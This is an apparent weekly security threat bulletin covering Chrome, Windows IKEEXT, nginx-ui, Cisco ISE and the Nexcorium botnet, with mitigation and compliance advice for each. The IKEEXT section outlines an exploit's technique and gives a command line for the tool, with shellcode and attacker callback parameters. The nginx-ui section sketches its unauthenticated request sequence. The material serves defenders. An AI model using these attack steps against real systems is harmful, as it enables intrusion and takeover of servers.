Weekly Threat Bulletin – April 22nd, 2026

Google Chrome - CVE-2026-6296

A critical heap buffer overflow vulnerability, identified as CVE-2026-6296 with a CVSS v3.1 score of 9.6, exists within the ANGLE (Almost Native Graphics Layer Engine) component of Google Chrome. This flaw allows a remote, unauthenticated attacker to execute arbitrary code with potential sandbox escape by processing a specially crafted HTML page, leading to memory corruption in the rendering process. Exploitation requires minimal user interaction, specifically visiting a malicious web page, and does not necessitate any special privileges. Affected versions include Google Chrome prior to 147.0.7727.101 for Windows and Linux, and prior to 147.0.7727.102 for macOS. To mitigate this risk, users must update Google Chrome to version 147.0.7727.101 or higher for Windows/Linux, and 147.0.7727.102 or higher for macOS, as a patch is available and no workaround exists.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Update all Google Chrome installations on Windows and Linux to version 147.0.7727.101 or higher.
• Update all Google Chrome installations on macOS to version 147.0.7727.102 or higher.
• Use asset inventory or vulnerability scanning tools to identify all devices with Google Chrome versions older than 147.0.7727.101 (for Windows/Linux) or 147.0.7727.102 (for macOS).
• Advise all users to exercise caution when browsing, especially when clicking links in emails or visiting unfamiliar websites, until browser updates are fully deployed.

Compliance Best Practices

• Implement or mature an automated software patch management system to ensure timely deployment of security updates for all third-party applications, particularly web browsers.
• Deploy or configure a web filtering solution to block access to known malicious, suspicious, and uncategorized websites.
• Tune Endpoint Detection and Response (EDR) policies to detect and alert on suspicious process behaviors originating from web browsers, such as spawning command-line interpreters or writing executable files to disk.
• Enforce a policy of least privilege by removing local administrator rights from standard user accounts to limit the impact of successful code execution vulnerabilities.

Exploit for CVE-2026-33824

A remote code execution exploit, identified as CVE-2026-33824, targets a double-free vulnerability within the Windows IKE Extension (IKEEXT) with a CVSS score of 9.8. This exploit, dated 2026-04-16, affects unpatched builds of Windows 10 (1607–22H2), Windows 11 (22H2–26H1), and Server 2016–2025. It operates remotely without user interaction or authentication, targeting UDP ports 500 or 4500. The exploit functions by sending a 4-packet IKEv2 `SA_INIT` sequence containing malformed Notify and Proposal payloads, triggering the double-free in `ikeext!IKEEXT::ProcessIKEPayload`. Heap grooming, facilitated by 16 parallel UDP flows, forces the freed chunk into a controlled freelist, enabling an arbitrary write primitive to overwrite the next pointer. This leads to a ROP chain that disables CFG and CET, pivoting execution to user-controlled memory to execute supplied raw shellcode or PE payloads within the IKEEXT context, equivalent to Local System privileges, resulting in a full SYSTEM shell without service interruption. This vulnerability is particularly useful for initial access to internet-facing VPN/IPsec hosts in enterprise environments, bypassing default mitigations. Usage requires root privileges on the attacker machine for raw sockets, with a command structure like ``./ike_rce` -t `<victim_IP>` -p <port> -s `<shellcode_file>` -l `<attacker_IP>` `<attacker_port>` --groom N`. This tool is strictly for authorized red team operations, penetration testing, and security research with explicit permission.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Immediately deploy the April 2026 Microsoft security updates for CVE-2026-33824 to all affected Windows 10, Windows 11, and Windows Server systems, prioritizing internet-facing servers.
• On perimeter firewalls, create a rule to block all inbound traffic on UDP ports 500 and 4500 to any assets that do not explicitly require IKEv2 for VPN or IPsec functions.
• For essential VPN servers that require IKEv2, update firewall rules to only allow inbound UDP traffic on ports 500 and 4500 from the specific IP addresses of authorized remote peers or branch offices.
• Identify all systems running the 'IKE and AuthIP IPsec Keying Modules' (IKEEXT) service. If the service is not essential for business operations, disable and stop the service.
• Configure network monitoring tools and SIEM to alert on anomalous or malformed IKEv2 SA_INIT packets destined for UDP ports 500 and 4500, and investigate alerts for signs of exploit attempts.

Compliance Best Practices

• Review and formalize the organization's vulnerability management policy to mandate patching of critical, internet-facing vulnerabilities with known exploits within a 72-hour service level agreement (SLA).
• Design and implement a network DMZ for all internet-facing services, including VPN concentrators. Enforce a strict, default-deny firewall policy that limits communication from the DMZ to the internal network to only absolutely necessary protocols and destinations.
• Establish a formal, quarterly attack surface review process to audit all internet-facing systems, identify and document all exposed ports and services, and remove or disable any that are not business-essential.
• Implement a default-deny egress filtering policy on firewalls for all server segments, especially the DMZ. Explicitly allow only required outbound traffic for patching, logging, and other approved business functions.
• Initiate a project to evaluate modern VPN technologies, such as WireGuard or vendor-specific SSL VPNs, as potential replacements for the existing IKEv2-based infrastructure to reduce reliance on legacy protocols.

Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover

A critical authentication bypass vulnerability, CVE-2026-33032 (CVSS score: 9.8), codenamed MCPwn, has been identified in nginx-ui, a third-party, open-source NGINX management tool not maintained by F5, and is under active exploitation. This flaw allows threat actors to achieve full Nginx server takeover by exploiting the `/mcp_message` endpoint, which, by default, lacks authentication and has an empty IP whitelist, effectively allowing all network attackers to invoke Model Context Protocol (MCP) tools. Attackers can establish a session via an HTTP GET request to `/mcp` to obtain a session ID, then use an HTTP POST request to `/mcp_message` with the session ID to modify Nginx configuration files, reload the server, intercept traffic, and harvest administrator credentials without authentication. The vulnerability was addressed in version 2.3.4, released on March 15, 2026, with recommended workarounds including adding `middleware.AuthRequired()` to the `/mcp_message` endpoint or changing the IP allowlisting default to "deny-all." Approximately 2,689 nginx-ui instances are publicly exposed, primarily in China, the U.S., Indonesia, Germany, and Hong Kong. This vulnerability follows the discovery of two related flaws, CVE-2026-27825 (CVSS 9.1) and CVE-2026-27826 (CVSS 8.2), dubbed MCPwnfluence, in the Atlassian MCP server (`mcp-atlassian`), which can be chained to achieve unauthenticated remote code execution from the local area network. These involve an arbitrary file write vulnerability and a Server-Side Request Forgery (SSRF), both fixed in `mcp-atlassian` version 0.17.0.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Immediately update all instances of nginx-ui to version 2.3.4 or later to remediate the authentication bypass vulnerability (CVE-2026-33032).
• Use a firewall or network access control lists (ACLs) to block all external access to the nginx-ui management interface. Access should only be permitted from trusted internal IP addresses.
• If patching is not immediately feasible, apply the recommended workaround by adding 'middleware.AuthRequired()' to the '/mcp_message' endpoint in the nginx-ui configuration to enforce authentication.
• As an alternative workaround, modify the nginx-ui configuration to change the default IP allowlisting behavior for the '/mcp_message' endpoint from 'allow-all' to 'deny-all'.
• Scan internal and external networks to identify all deployed instances of nginx-ui. Review web server and network logs for anomalous POST requests to the '/mcp_message' endpoint originating from untrusted IP addresses.

Compliance Best Practices

• Establish and enforce a security policy that requires all new software and services to be configured with a 'deny-by-default' or 'fail-safe' security posture, explicitly prohibiting permissive defaults like empty whitelists that allow universal access.
• Implement network segmentation to isolate all system management interfaces, including web UIs like nginx-ui, from the public internet and general corporate networks. Mandate that access to these interfaces requires use of a VPN with multi-factor authentication.
• Incorporate a mandatory security review process for any third-party plugins, modules, or integrations before they are deployed into production to ensure they properly inherit and enforce the security controls of the parent application.
• Refine the vulnerability management program to prioritize remediation based on evidence of active exploitation and asset exposure, establishing strict service-level agreements (SLAs) for patching critical, internet-facing systems.

Cisco Identity Services Engine Remote Code Execution Vulnerabilities

Multiple critical remote code execution (RCE) vulnerabilities, identified as CVE-2026-20180 and CVE-2026-20186 with a CVSS score of 9.9, affect Cisco Identity Services Engine (ISE). These vulnerabilities allow an authenticated, remote attacker with at least Read Only Admin credentials to execute arbitrary commands on the underlying operating system. The flaws are due to insufficient validation of user-supplied input, enabling an attacker to send a crafted HTTP request to gain user-level access and potentially elevate privileges to root. In single-node ISE deployments, successful exploitation could also lead to a denial of service condition. Affected versions include ISE releases earlier than 3.2, 3.2, 3.3, and 3.4, while Cisco ISE 3.5 is not vulnerable. There are no workarounds available; therefore, users must upgrade to fixed software releases: 3.2 Patch 8, 3.3 Patch 8, or 3.4 Patch 4. These vulnerabilities were discovered during internal security testing by the Cisco Advanced Security Initiatives Group (ASIG).

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Identify all Cisco ISE instances and upgrade them to a fixed software version immediately. For ISE version 3.2, apply Patch 8. For version 3.3, apply Patch 8. For version 3.4, apply Patch 4. For any version earlier than 3.2, migrate to a fixed release.
• Conduct an immediate audit of all accounts with administrative access to Cisco ISE, including 'Read Only' roles. Disable any dormant or unnecessary accounts and enforce a password rotation for all remaining privileged accounts.
• Enforce multi-factor authentication (MFA) on all administrative accounts that can log in to the Cisco ISE management interface.
• Update firewall rules to restrict network access to the Cisco ISE management web interface. Only allow connections from a limited set of authorized IP addresses, such as a secure management subnet or specific administrative workstations.
• Increase monitoring of Cisco ISE access logs. Investigate any anomalous login patterns or suspicious HTTP requests directed at the management interface, especially from unexpected source IP addresses.

Compliance Best Practices

• Establish a formal vulnerability management program that includes asset inventory, regular scanning, risk-based prioritization, and defined service-level agreements (SLAs) for patching critical infrastructure like Cisco ISE.
• Implement a quarterly access review process for all privileged accounts on critical network infrastructure. The goal is to enforce the principle of least privilege and ensure that accounts, especially non-interactive or read-only ones, have the minimum necessary permissions.
• Design and implement a secure management network zone, isolated from general user and production server traffic, to host the management interfaces of all critical infrastructure, including Cisco ISE.

Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign

A new Mirai variant, Nexcorium, is actively exploiting CVE-2024-3721, an OS command injection vulnerability in TBK DVR-4104 and DVR-4216 devices, in a campaign attributed to the "Nexus Team." The infection chain involves a downloader script (`dvr`) fetching multi-architecture Nexcorium malware, which then displays "nexuscorp has taken control" upon execution. This Mirai-like malware utilizes XOR-encoded configurations for its C2 server (`r3brqw3d[.]b0ats[.]top`), persistence commands, and a hard-coded brute-force wordlist, also incorporating an exploit for CVE-2017-17215 targeting Huawei HG532 devices. Nexcorium establishes persistence through multiple mechanisms, including modifying `/etc/inittab` and `/etc/rc.local`, creating a `systemd` service (`/etc/systemd/system/persist.service`), and adding `crontab` entries, subsequently deleting its original binary to evade analysis. The botnet supports diverse DDoS attack methods, such as UDP, TCP ACK/SYN/PSH/URG, SMTP, VSE query, and UDP blast floods. Indicators of compromise include C2 hosts `84[.]200[.]87[.]36`, `176[.]65[.]148[.]186`, and file hashes like `696aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35` for the downloader.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Add the IP addresses 84.200.87.36 and 176.65.148.186 to your firewall's blocklist.
• Add the domain r3brqw3d.b0ats.top to your DNS filter or web proxy blocklist.
• Add all file hashes listed in the article's IOC section to your Endpoint Detection and Response (EDR) or antivirus solution's blocklist.
• Scan your network for TBK DVR-4104 and DVR-4216 devices and determine if they are vulnerable to CVE-2024-3721. Isolate any identified vulnerable devices from the network immediately.
• Scan your network for Huawei HG532 devices and determine if they are vulnerable to CVE-2017-17215. Isolate any identified vulnerable devices from the network.
• Verify that your Intrusion Prevention System (IPS) has signatures enabled to detect and block exploitation attempts against CVE-2024-3721, such as Fortinet's signature 55717.
• Query firewall, web proxy, and web server logs for the HTTP header 'X-Hacked-By' to identify systems that may have been targeted or compromised.
• On suspect Linux-based IoT devices, inspect the '/etc/inittab' and '/etc/rc.local' files for unauthorized modifications or additions.
• On suspect Linux-based IoT devices, check for the existence of the file '/etc/systemd/system/persist.service'.
• On suspect Linux-based IoT devices, review system and user crontabs for newly created or suspicious scheduled jobs.

Compliance Best Practices

• Design and implement a network segmentation project to place all IoT devices, including DVRs and cameras, on an isolated network segment with strict firewall rules limiting inbound and outbound communication.
• Implement a corporate policy and perform configuration hardening to disable the Telnet service on all network devices and servers, enforcing the use of SSH for secure management.
• Enforce a strict policy that requires changing all default credentials on any new device, server, or software during its initial setup and deployment.
• Establish a formal vulnerability management program that includes asset inventory, regular scanning, risk-based prioritization, and defined SLAs for patching.
• Configure firewall egress filtering rules to deny all outbound traffic by default, especially from the IoT network segment, and only permit traffic required for essential functions on approved ports and destinations.
• Develop and maintain a comprehensive asset inventory of all network-connected devices, particularly IoT and OT systems, to ensure all assets are included in security monitoring and vulnerability management.